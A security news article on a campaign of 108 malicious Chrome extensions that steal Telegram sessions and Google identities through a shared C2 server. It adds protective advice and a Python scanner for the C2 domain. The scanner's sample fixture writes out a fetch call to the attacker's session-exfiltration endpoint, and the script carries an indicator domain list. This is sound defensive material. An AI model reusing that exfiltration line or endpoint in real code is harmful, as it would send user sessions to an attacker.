
Dozens of extensions on the Chrome Web Store were found to contain malware controlled by a single operator. Thousands of users who installed them have had a backdoor planted and their data and session tokens stolen, while the extensions remain live.
The Socket Threat Research Team flagged 108 malicious Chrome extensions as part of a coordinated campaign. They are published under five distinct publisher identities. However, the extensions all route stolen credentials, user identities, and browsing data to servers controlled by the same operator.
Many of the listed extensions span a wide range of product categories, including Telegram or YouTube sidebars, translation or other utilities, and slot machines and other games.
The analyzed extensions deliver promised functionality. However, in the background, they also run malicious code, connect to a command-and-control (C2) server, exfiltrate identities and session data, and open arbitrary websites in users’ browsers.
“The most severe extension in the campaign is Telegram Multi-account. It steals the active Telegram Web session from the victim’s browser and transmits it to tg[.]cloudapi[.]stream/save_session.php (attacker-controlled server) every 15 seconds,” Socket warns in a report.
This data enables the threat actor to access all messages and contacts without the need for a password or multi-factor authentication.
This extension was last updated on February 15th, 2025, meaning it contained malicious functionality for more than a year.
The largest group (54) of the malicious extensions targets Google account identity: on sign-in, they obtain an OAuth2 token and use it to fetch the user's Google profile, which is then sent to the attacker.
“The OAuth token is used locally and never leaves the browser. What reaches the operator's server is only a permanent identity record: the victim's email, name, and profile picture,” the Socket report explains.
Dozens of extensions (45) contain a universal backdoor that opens arbitrary URLs on browser start.
“Any browser with one of the 45 loadInfo() backdoor extensions installed responds to server-issued commands on every browser start, even if the user never opens the extension,” Socket said.
Other extensions were found to inject ads and other content scripts into the pages the users visit.
The flagged extensions don’t have a massive user base – across all 108 extensions, approximately 20K installs were recorded. Despite takedown requests submitted by Socket to the Chrome Web Store security team and Google Safe Browsing, most of the extensions remain live at the time of reporting.
All extensions share the same backend – a malicious server, cloudapi[.]stream, registered on April 30th, 2022. Socket researchers suspect that the attackers operate a malware-as-a-service platform, where stolen identities and sessions are accessible to purchasers.
How to protect yourself?
Socket provides the full list of malicious extensions and urges users to remove them immediately. Those who used the Telegram Multi-account extension should also log out of all Telegram Web sessions using their Telegram mobile app (go to Settings, select Devices, choose “Terminate all other sessions”).
“If you signed into any of the slot games, casino, or sidebar extensions using Google, treat your Google identity as exposed. Review third-party app access at myaccount.google.com/permissions and revoke any unfamiliar entries,” Socket suggests.
Any account registered through these extensions means the attackers already hold the user's email address and the name that was provided.
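For the removal step above, one practical check is to scan a Chrome profile's Extensions directory for any package that references the campaign's shared backend domain. This is an added example, not Socket's tooling; the on-disk layout `Extensions/<id>/<version>/manifest.json` is assumed, and the two sample extensions are constructed for the demonstration.

```python
import json
import re
import tempfile
from pathlib import Path

# Indicator taken from the report: the shared C2 backend (defanged there as cloudapi[.]stream).
IOC_DOMAINS = ("cloudapi.stream",)
EXT_ID = re.compile(r"^[a-p]{32}$")  # Chrome extension IDs are 32 chars from a-p

def scan_extension(ext_dir: Path) -> list[tuple[str, str]]:
    """Return (relative file, matched domain) pairs for files referencing an IOC domain."""
    hits = []
    for path in ext_dir.rglob("*"):
        if path.suffix.lower() not in (".js", ".json", ".html"):
            continue
        text = path.read_text(errors="ignore")
        for dom in IOC_DOMAINS:
            if dom in text:
                hits.append((path.relative_to(ext_dir).as_posix(), dom))
    return hits

def scan_profile(extensions_root: Path) -> list[dict]:
    """Walk <profile>/Extensions/<id>/<version>/ (assumed Chrome layout) and report matches."""
    findings = []
    for id_dir in sorted(extensions_root.iterdir()):
        if not (id_dir.is_dir() and EXT_ID.match(id_dir.name)):
            continue
        for ver_dir in sorted(id_dir.iterdir()):
            manifest = ver_dir / "manifest.json"
            if not manifest.is_file():
                continue
            hits = scan_extension(ver_dir)
            if hits:
                name = json.loads(manifest.read_text(errors="ignore")).get("name", "?")
                findings.append({"id": id_dir.name, "name": name,
                                 "version": ver_dir.name, "hits": hits})
    return findings

def build_sample_profile() -> Path:
    """Constructed sample: one extension phoning the IOC domain, one clean one."""
    root = Path(tempfile.mkdtemp()) / "Extensions"
    bad = root / ("a" * 32) / "1.0.0_0"
    good = root / ("b" * 32) / "2.1_0"
    for d, name, bg in ((bad, "Sample Sidebar", "fetch('https://tg.cloudapi.stream/save_session.php')"),
                        (good, "Clean Util", "console.log('ok')")):
        d.mkdir(parents=True)
        (d / "manifest.json").write_text(json.dumps(
            {"name": name, "manifest_version": 3, "background": {"service_worker": "bg.js"}}))
        (d / "bg.js").write_text(bg)
    return root

if __name__ == "__main__":
    for f in scan_profile(build_sample_profile()):
        print(f"{f['id']} {f['name']} {f['version']}: {f['hits']}")
```

On a real machine, point `scan_profile` at the profile's Extensions folder (for example `~/.config/google-chrome/Default/Extensions` on Linux) and extend `IOC_DOMAINS` with the indicators from Socket's full list.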
Security researchers have long been warning that extensions “see everything,” control what users see in the browser, and the entire supply chain is vulnerable to attackers. A recent report demonstrated that extensions can secretly install malware by modifying every downloaded file without requiring any permissions.